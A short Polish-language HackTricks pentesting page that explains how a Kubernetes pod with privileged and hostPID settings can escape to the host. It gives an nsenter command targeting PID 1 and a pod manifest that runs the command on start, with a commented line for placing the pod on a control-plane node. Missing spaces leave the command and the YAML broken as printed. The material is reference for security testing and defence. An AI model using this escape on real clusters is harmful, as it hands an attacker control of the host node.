Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y doHackTricks i HackTricks Cloud repozytoriów github.
Uprawnienia privileged i hostPID
Dzięki tym uprawnieniom będziesz mieć dostęp do procesów hosta i wystarczające uprawnienia, aby wejść do przestrzeni nazw jednego z procesów hosta.
Należy zauważyć, że potencjalnie nie musisz mieć uprawnienia privileged, ale tylko niektóre zdolności i inne potencjalne obejścia zabezpieczeń (takie jak apparmor i/lub seccomp).
Wystarczy wykonanie czegoś takiego jak poniższe polecenie, aby uciec z kontenera:
nsenter--target1--mount--uts--ipc--net--pid--bash
Przykład konfiguracji:
apiVersion:v1kind:Podmetadata:name:priv-and-hostpid-exec-podlabels:app:pentestspec:hostPID:truecontainers:- name:priv-and-hostpid-podimage:ubuntutty:truesecurityContext:privileged:truecommand: [ "nsenter","--target","1","--mount","--uts","--ipc","--net","--pid","--","bash" ]#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name